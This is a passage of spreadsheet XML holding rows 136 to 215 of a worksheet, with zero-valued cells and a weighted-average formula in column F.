      <c r="D136" s="14">
        <v>0</v>
      </c>
      <c r="E136" s="14">
        <v>0</v>
      </c>
      <c r="F136" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="137" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A137" s="41"/>
      <c r="B137" s="45"/>
      <c r="C137" s="14">
        <v>0</v>
      </c>
      <c r="D137" s="14">
        <v>0</v>
      </c>
      <c r="E137" s="14">
        <v>0</v>
      </c>
      <c r="F137" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="138" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A138" s="41"/>
      <c r="B138" s="45"/>
      <c r="C138" s="14">
        <v>0</v>
      </c>
      <c r="D138" s="14">
        <v>0</v>
      </c>
      <c r="E138" s="14">
        <v>0</v>
      </c>
      <c r="F138" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="139" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A139" s="41"/>
      <c r="B139" s="45"/>
      <c r="C139" s="14">
        <v>0</v>
      </c>
      <c r="D139" s="14">
        <v>0</v>
      </c>
      <c r="E139" s="14">
        <v>0</v>
      </c>
      <c r="F139" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="140" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A140" s="41"/>
      <c r="B140" s="45"/>
      <c r="C140" s="14">
        <v>0</v>
      </c>
      <c r="D140" s="14">
        <v>0</v>
      </c>
      <c r="E140" s="14">
        <v>0</v>
      </c>
      <c r="F140" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="141" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A141" s="41"/>
      <c r="B141" s="45"/>
      <c r="C141" s="14">
        <v>0</v>
      </c>
      <c r="D141" s="14">
        <v>0</v>
      </c>
      <c r="E141" s="14">
        <v>0</v>
      </c>
      <c r="F141" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="142" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A142" s="41"/>
      <c r="B142" s="45"/>
      <c r="C142" s="14">
        <v>0</v>
      </c>
      <c r="D142" s="14">
        <v>0</v>
      </c>
      <c r="E142" s="14">
        <v>0</v>
      </c>
      <c r="F142" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="143" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A143" s="41"/>
      <c r="B143" s="45"/>
      <c r="C143" s="14">
        <v>0</v>
      </c>
      <c r="D143" s="14">
        <v>0</v>
      </c>
      <c r="E143" s="14">
        <v>0</v>
      </c>
      <c r="F143" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="144" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A144" s="41"/>
      <c r="B144" s="45"/>
      <c r="C144" s="14">
        <v>0</v>
      </c>
      <c r="D144" s="14">
        <v>0</v>
      </c>
      <c r="E144" s="14">
        <v>0</v>
      </c>
      <c r="F144" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="145" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A145" s="41"/>
      <c r="B145" s="45"/>
      <c r="C145" s="14">
        <v>0</v>
      </c>
      <c r="D145" s="14">
        <v>0</v>
      </c>
      <c r="E145" s="14">
        <v>0</v>
      </c>
      <c r="F145" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="146" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A146" s="41"/>
      <c r="B146" s="45"/>
      <c r="C146" s="14">
        <v>0</v>
      </c>
      <c r="D146" s="14">
        <v>0</v>
      </c>
      <c r="E146" s="14">
        <v>0</v>
      </c>
      <c r="F146" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="147" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A147" s="41"/>
      <c r="B147" s="45"/>
      <c r="C147" s="14">
        <v>0</v>
      </c>
      <c r="D147" s="14">
        <v>0</v>
      </c>
      <c r="E147" s="14">
        <v>0</v>
      </c>
      <c r="F147" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="148" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A148" s="41"/>
      <c r="B148" s="45"/>
      <c r="C148" s="14">
        <v>0</v>
      </c>
      <c r="D148" s="14">
        <v>0</v>
      </c>
      <c r="E148" s="14">
        <v>0</v>
      </c>
      <c r="F148" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="149" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A149" s="41"/>
      <c r="B149" s="45"/>
      <c r="C149" s="14">
        <v>0</v>
      </c>
      <c r="D149" s="14">
        <v>0</v>
      </c>
      <c r="E149" s="14">
        <v>0</v>
      </c>
      <c r="F149" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="150" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A150" s="41"/>
      <c r="B150" s="45"/>
      <c r="C150" s="14">
        <v>0</v>
      </c>
      <c r="D150" s="14">
        <v>0</v>
      </c>
      <c r="E150" s="14">
        <v>0</v>
      </c>
      <c r="F150" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="151" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A151" s="41"/>
      <c r="B151" s="45"/>
      <c r="C151" s="14">
        <v>0</v>
      </c>
      <c r="D151" s="14">
        <v>0</v>
      </c>
      <c r="E151" s="14">
        <v>0</v>
      </c>
      <c r="F151" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="152" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A152" s="41"/>
      <c r="B152" s="45"/>
      <c r="C152" s="14">
        <v>0</v>
      </c>
      <c r="D152" s="14">
        <v>0</v>
      </c>
      <c r="E152" s="14">
        <v>0</v>
      </c>
      <c r="F152" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="153" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A153" s="41"/>
      <c r="B153" s="45"/>
      <c r="C153" s="14">
        <v>0</v>
      </c>
      <c r="D153" s="14">
        <v>0</v>
      </c>
      <c r="E153" s="14">
        <v>0</v>
      </c>
      <c r="F153" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="154" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A154" s="41"/>
      <c r="B154" s="45"/>
      <c r="C154" s="14">
        <v>0</v>
      </c>
      <c r="D154" s="14">
        <v>0</v>
      </c>
      <c r="E154" s="14">
        <v>0</v>
      </c>
      <c r="F154" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="155" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A155" s="41"/>
      <c r="B155" s="45"/>
      <c r="C155" s="14">
        <v>0</v>
      </c>
      <c r="D155" s="14">
        <v>0</v>
      </c>
      <c r="E155" s="14">
        <v>0</v>
      </c>
      <c r="F155" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="156" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A156" s="41"/>
      <c r="B156" s="45"/>
      <c r="C156" s="14">
        <v>0</v>
      </c>
      <c r="D156" s="14">
        <v>0</v>
      </c>
      <c r="E156" s="14">
        <v>0</v>
      </c>
      <c r="F156" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="157" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A157" s="41"/>
      <c r="B157" s="45"/>
      <c r="C157" s="14">
        <v>0</v>
      </c>
      <c r="D157" s="14">
        <v>0</v>
      </c>
      <c r="E157" s="14">
        <v>0</v>
      </c>
      <c r="F157" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="158" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A158" s="41"/>
      <c r="B158" s="45"/>
      <c r="C158" s="14">
        <v>0</v>
      </c>
      <c r="D158" s="14">
        <v>0</v>
      </c>
      <c r="E158" s="14">
        <v>0</v>
      </c>
      <c r="F158" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="159" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A159" s="41"/>
      <c r="B159" s="45"/>
      <c r="C159" s="14">
        <v>0</v>
      </c>
      <c r="D159" s="14">
        <v>0</v>
      </c>
      <c r="E159" s="14">
        <v>0</v>
      </c>
      <c r="F159" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="160" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A160" s="41"/>
      <c r="B160" s="45"/>
      <c r="C160" s="14">
        <v>0</v>
      </c>
      <c r="D160" s="14">
        <v>0</v>
      </c>
      <c r="E160" s="14">
        <v>0</v>
      </c>
      <c r="F160" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="161" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A161" s="41"/>
      <c r="B161" s="45"/>
      <c r="C161" s="14">
        <v>0</v>
      </c>
      <c r="D161" s="14">
        <v>0</v>
      </c>
      <c r="E161" s="14">
        <v>0</v>
      </c>
      <c r="F161" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="162" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A162" s="41"/>
      <c r="B162" s="45"/>
      <c r="C162" s="14">
        <v>0</v>
      </c>
      <c r="D162" s="14">
        <v>0</v>
      </c>
      <c r="E162" s="14">
        <v>0</v>
      </c>
      <c r="F162" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="163" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A163" s="41"/>
      <c r="B163" s="45"/>
      <c r="C163" s="14">
        <v>0</v>
      </c>
      <c r="D163" s="14">
        <v>0</v>
      </c>
      <c r="E163" s="14">
        <v>0</v>
      </c>
      <c r="F163" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="164" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A164" s="41"/>
      <c r="B164" s="45"/>
      <c r="C164" s="14">
        <v>0</v>
      </c>
      <c r="D164" s="14">
        <v>0</v>
      </c>
      <c r="E164" s="14">
        <v>0</v>
      </c>
      <c r="F164" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="165" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A165" s="41"/>
      <c r="B165" s="45"/>
      <c r="C165" s="14">
        <v>0</v>
      </c>
      <c r="D165" s="14">
        <v>0</v>
      </c>
      <c r="E165" s="14">
        <v>0</v>
      </c>
      <c r="F165" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="166" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A166" s="41"/>
      <c r="B166" s="45"/>
      <c r="C166" s="14">
        <v>0</v>
      </c>
      <c r="D166" s="14">
        <v>0</v>
      </c>
      <c r="E166" s="14">
        <v>0</v>
      </c>
      <c r="F166" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="167" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A167" s="41"/>
      <c r="B167" s="45"/>
      <c r="C167" s="14">
        <v>0</v>
      </c>
      <c r="D167" s="14">
        <v>0</v>
      </c>
      <c r="E167" s="14">
        <v>0</v>
      </c>
      <c r="F167" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="168" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A168" s="41"/>
      <c r="B168" s="45"/>
      <c r="C168" s="14">
        <v>0</v>
      </c>
      <c r="D168" s="14">
        <v>0</v>
      </c>
      <c r="E168" s="14">
        <v>0</v>
      </c>
      <c r="F168" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="169" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A169" s="41"/>
      <c r="B169" s="45"/>
      <c r="C169" s="14">
        <v>0</v>
      </c>
      <c r="D169" s="14">
        <v>0</v>
      </c>
      <c r="E169" s="14">
        <v>0</v>
      </c>
      <c r="F169" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="170" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A170" s="41"/>
      <c r="B170" s="45"/>
      <c r="C170" s="14">
        <v>0</v>
      </c>
      <c r="D170" s="14">
        <v>0</v>
      </c>
      <c r="E170" s="14">
        <v>0</v>
      </c>
      <c r="F170" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="171" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A171" s="41"/>
      <c r="B171" s="45"/>
      <c r="C171" s="14">
        <v>0</v>
      </c>
      <c r="D171" s="14">
        <v>0</v>
      </c>
      <c r="E171" s="14">
        <v>0</v>
      </c>
      <c r="F171" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="172" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A172" s="41"/>
      <c r="B172" s="45"/>
      <c r="C172" s="14">
        <v>0</v>
      </c>
      <c r="D172" s="14">
        <v>0</v>
      </c>
      <c r="E172" s="14">
        <v>0</v>
      </c>
      <c r="F172" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="173" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A173" s="41"/>
      <c r="B173" s="45"/>
      <c r="C173" s="14">
        <v>0</v>
      </c>
      <c r="D173" s="14">
        <v>0</v>
      </c>
      <c r="E173" s="14">
        <v>0</v>
      </c>
      <c r="F173" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="174" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A174" s="41"/>
      <c r="B174" s="45"/>
      <c r="C174" s="14">
        <v>0</v>
      </c>
      <c r="D174" s="14">
        <v>0</v>
      </c>
      <c r="E174" s="14">
        <v>0</v>
      </c>
      <c r="F174" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="175" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A175" s="41"/>
      <c r="B175" s="45"/>
      <c r="C175" s="14">
        <v>0</v>
      </c>
      <c r="D175" s="14">
        <v>0</v>
      </c>
      <c r="E175" s="14">
        <v>0</v>
      </c>
      <c r="F175" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="176" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A176" s="41"/>
      <c r="B176" s="45"/>
      <c r="C176" s="14">
        <v>0</v>
      </c>
      <c r="D176" s="14">
        <v>0</v>
      </c>
      <c r="E176" s="14">
        <v>0</v>
      </c>
      <c r="F176" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="177" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A177" s="41"/>
      <c r="B177" s="45"/>
      <c r="C177" s="14">
        <v>0</v>
      </c>
      <c r="D177" s="14">
        <v>0</v>
      </c>
      <c r="E177" s="14">
        <v>0</v>
      </c>
      <c r="F177" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="178" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A178" s="41"/>
      <c r="B178" s="45"/>
      <c r="C178" s="14">
        <v>0</v>
      </c>
      <c r="D178" s="14">
        <v>0</v>
      </c>
      <c r="E178" s="14">
        <v>0</v>
      </c>
      <c r="F178" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="179" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A179" s="41"/>
      <c r="B179" s="45"/>
      <c r="C179" s="14">
        <v>0</v>
      </c>
      <c r="D179" s="14">
        <v>0</v>
      </c>
      <c r="E179" s="14">
        <v>0</v>
      </c>
      <c r="F179" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="180" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A180" s="41"/>
      <c r="B180" s="45"/>
      <c r="C180" s="14">
        <v>0</v>
      </c>
      <c r="D180" s="14">
        <v>0</v>
      </c>
      <c r="E180" s="14">
        <v>0</v>
      </c>
      <c r="F180" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="181" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A181" s="41"/>
      <c r="B181" s="45"/>
      <c r="C181" s="14">
        <v>0</v>
      </c>
      <c r="D181" s="14">
        <v>0</v>
      </c>
      <c r="E181" s="14">
        <v>0</v>
      </c>
      <c r="F181" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="182" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A182" s="41"/>
      <c r="B182" s="45"/>
      <c r="C182" s="14">
        <v>0</v>
      </c>
      <c r="D182" s="14">
        <v>0</v>
      </c>
      <c r="E182" s="14">
        <v>0</v>
      </c>
      <c r="F182" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="183" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A183" s="41"/>
      <c r="B183" s="45"/>
      <c r="C183" s="14">
        <v>0</v>
      </c>
      <c r="D183" s="14">
        <v>0</v>
      </c>
      <c r="E183" s="14">
        <v>0</v>
      </c>
      <c r="F183" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="184" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A184" s="41"/>
      <c r="B184" s="45"/>
      <c r="C184" s="14">
        <v>0</v>
      </c>
      <c r="D184" s="14">
        <v>0</v>
      </c>
      <c r="E184" s="14">
        <v>0</v>
      </c>
      <c r="F184" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="185" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A185" s="41"/>
      <c r="B185" s="45"/>
      <c r="C185" s="14">
        <v>0</v>
      </c>
      <c r="D185" s="14">
        <v>0</v>
      </c>
      <c r="E185" s="14">
        <v>0</v>
      </c>
      <c r="F185" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="186" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A186" s="41"/>
      <c r="B186" s="45"/>
      <c r="C186" s="14">
        <v>0</v>
      </c>
      <c r="D186" s="14">
        <v>0</v>
      </c>
      <c r="E186" s="14">
        <v>0</v>
      </c>
      <c r="F186" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="187" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A187" s="41"/>
      <c r="B187" s="45"/>
      <c r="C187" s="14">
        <v>0</v>
      </c>
      <c r="D187" s="14">
        <v>0</v>
      </c>
      <c r="E187" s="14">
        <v>0</v>
      </c>
      <c r="F187" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="188" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A188" s="41"/>
      <c r="B188" s="45"/>
      <c r="C188" s="14">
        <v>0</v>
      </c>
      <c r="D188" s="14">
        <v>0</v>
      </c>
      <c r="E188" s="14">
        <v>0</v>
      </c>
      <c r="F188" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="189" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A189" s="41"/>
      <c r="B189" s="45"/>
      <c r="C189" s="14">
        <v>0</v>
      </c>
      <c r="D189" s="14">
        <v>0</v>
      </c>
      <c r="E189" s="14">
        <v>0</v>
      </c>
      <c r="F189" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="190" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A190" s="41"/>
      <c r="B190" s="45"/>
      <c r="C190" s="14">
        <v>0</v>
      </c>
      <c r="D190" s="14">
        <v>0</v>
      </c>
      <c r="E190" s="14">
        <v>0</v>
      </c>
      <c r="F190" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="191" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A191" s="41"/>
      <c r="B191" s="45"/>
      <c r="C191" s="14">
        <v>0</v>
      </c>
      <c r="D191" s="14">
        <v>0</v>
      </c>
      <c r="E191" s="14">
        <v>0</v>
      </c>
      <c r="F191" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="192" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A192" s="41"/>
      <c r="B192" s="45"/>
      <c r="C192" s="14">
        <v>0</v>
      </c>
      <c r="D192" s="14">
        <v>0</v>
      </c>
      <c r="E192" s="14">
        <v>0</v>
      </c>
      <c r="F192" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="193" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A193" s="41"/>
      <c r="B193" s="45"/>
      <c r="C193" s="14">
        <v>0</v>
      </c>
      <c r="D193" s="14">
        <v>0</v>
      </c>
      <c r="E193" s="14">
        <v>0</v>
      </c>
      <c r="F193" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="194" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A194" s="41"/>
      <c r="B194" s="45"/>
      <c r="C194" s="14">
        <v>0</v>
      </c>
      <c r="D194" s="14">
        <v>0</v>
      </c>
      <c r="E194" s="14">
        <v>0</v>
      </c>
      <c r="F194" s="32">
        <f t="shared" ref="F194:F245" si="3">((C194*2)+D194+(E194*2))/5</f>
        <v>0</v>
      </c>
    </row>
    <row r="195" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A195" s="41"/>
      <c r="B195" s="45"/>
      <c r="C195" s="14">
        <v>0</v>
      </c>
      <c r="D195" s="14">
        <v>0</v>
      </c>
      <c r="E195" s="14">
        <v>0</v>
      </c>
      <c r="F195" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="196" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A196" s="41"/>
      <c r="B196" s="45"/>
      <c r="C196" s="14">
        <v>0</v>
      </c>
      <c r="D196" s="14">
        <v>0</v>
      </c>
      <c r="E196" s="14">
        <v>0</v>
      </c>
      <c r="F196" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="197" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A197" s="41"/>
      <c r="B197" s="45"/>
      <c r="C197" s="14">
        <v>0</v>
      </c>
      <c r="D197" s="14">
        <v>0</v>
      </c>
      <c r="E197" s="14">
        <v>0</v>
      </c>
      <c r="F197" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="198" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A198" s="41"/>
      <c r="B198" s="45"/>
      <c r="C198" s="14">
        <v>0</v>
      </c>
      <c r="D198" s="14">
        <v>0</v>
      </c>
      <c r="E198" s="14">
        <v>0</v>
      </c>
      <c r="F198" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="199" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A199" s="41"/>
      <c r="B199" s="45"/>
      <c r="C199" s="14">
        <v>0</v>
      </c>
      <c r="D199" s="14">
        <v>0</v>
      </c>
      <c r="E199" s="14">
        <v>0</v>
      </c>
      <c r="F199" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="200" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A200" s="41"/>
      <c r="B200" s="45"/>
      <c r="C200" s="14">
        <v>0</v>
      </c>
      <c r="D200" s="14">
        <v>0</v>
      </c>
      <c r="E200" s="14">
        <v>0</v>
      </c>
      <c r="F200" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="201" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A201" s="41"/>
      <c r="B201" s="45"/>
      <c r="C201" s="14">
        <v>0</v>
      </c>
      <c r="D201" s="14">
        <v>0</v>
      </c>
      <c r="E201" s="14">
        <v>0</v>
      </c>
      <c r="F201" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="202" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A202" s="41"/>
      <c r="B202" s="45"/>
      <c r="C202" s="14">
        <v>0</v>
      </c>
      <c r="D202" s="14">
        <v>0</v>
      </c>
      <c r="E202" s="14">
        <v>0</v>
      </c>
      <c r="F202" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="203" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A203" s="41"/>
      <c r="B203" s="45"/>
      <c r="C203" s="14">
        <v>0</v>
      </c>
      <c r="D203" s="14">
        <v>0</v>
      </c>
      <c r="E203" s="14">
        <v>0</v>
      </c>
      <c r="F203" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="204" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A204" s="41"/>
      <c r="B204" s="45"/>
      <c r="C204" s="14">
        <v>0</v>
      </c>
      <c r="D204" s="14">
        <v>0</v>
      </c>
      <c r="E204" s="14">
        <v>0</v>
      </c>
      <c r="F204" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="205" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A205" s="41"/>
      <c r="B205" s="45"/>
      <c r="C205" s="14">
        <v>0</v>
      </c>
      <c r="D205" s="14">
        <v>0</v>
      </c>
      <c r="E205" s="14">
        <v>0</v>
      </c>
      <c r="F205" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="206" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A206" s="41"/>
      <c r="B206" s="45"/>
      <c r="C206" s="14">
        <v>0</v>
      </c>
      <c r="D206" s="14">
        <v>0</v>
      </c>
      <c r="E206" s="14">
        <v>0</v>
      </c>
      <c r="F206" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="207" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A207" s="41"/>
      <c r="B207" s="45"/>
      <c r="C207" s="14">
        <v>0</v>
      </c>
      <c r="D207" s="14">
        <v>0</v>
      </c>
      <c r="E207" s="14">
        <v>0</v>
      </c>
      <c r="F207" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="208" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A208" s="41"/>
      <c r="B208" s="45"/>
      <c r="C208" s="14">
        <v>0</v>
      </c>
      <c r="D208" s="14">
        <v>0</v>
      </c>
      <c r="E208" s="14">
        <v>0</v>
      </c>
      <c r="F208" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="209" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A209" s="41"/>
      <c r="B209" s="45"/>
      <c r="C209" s="14">
        <v>0</v>
      </c>
      <c r="D209" s="14">
        <v>0</v>
      </c>
      <c r="E209" s="14">
        <v>0</v>
      </c>
      <c r="F209" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="210" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A210" s="41"/>
      <c r="B210" s="45"/>
      <c r="C210" s="14">
        <v>0</v>
      </c>
      <c r="D210" s="14">
        <v>0</v>
      </c>
      <c r="E210" s="14">
        <v>0</v>
      </c>
      <c r="F210" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="211" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A211" s="41"/>
      <c r="B211" s="45"/>
      <c r="C211" s="14">
        <v>0</v>
      </c>
      <c r="D211" s="14">
        <v>0</v>
      </c>
      <c r="E211" s="14">
        <v>0</v>
      </c>
      <c r="F211" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="212" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A212" s="41"/>
      <c r="B212" s="45"/>
      <c r="C212" s="14">
        <v>0</v>
      </c>
      <c r="D212" s="14">
        <v>0</v>
      </c>
      <c r="E212" s="14">
        <v>0</v>
      </c>
      <c r="F212" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="213" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A213" s="41"/>
      <c r="B213" s="45"/>
      <c r="C213" s="14">
        <v>0</v>
      </c>
      <c r="D213" s="14">
        <v>0</v>
      </c>
      <c r="E213" s="14">
        <v>0</v>
      </c>
      <c r="F213" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="214" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A214" s="41"/>
      <c r="B214" s="45"/>
      <c r="C214" s="14">
        <v>0</v>
      </c>
      <c r="D214" s="14">
        <v>0</v>
      </c>
      <c r="E214" s="14">
        <v>0</v>
      </c>
      <c r="F214" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="215" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A215" s="41"/>
      <c r="B215" s="45"/>
      <c r="C215" s="14">
        <v>0</v>
      </c>
      <c r="D215" s="14">
        <v>0</v>
      </c>
      <c r="E215" s="14">
        <v>0</v>
      </c>
      <c r="F215" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
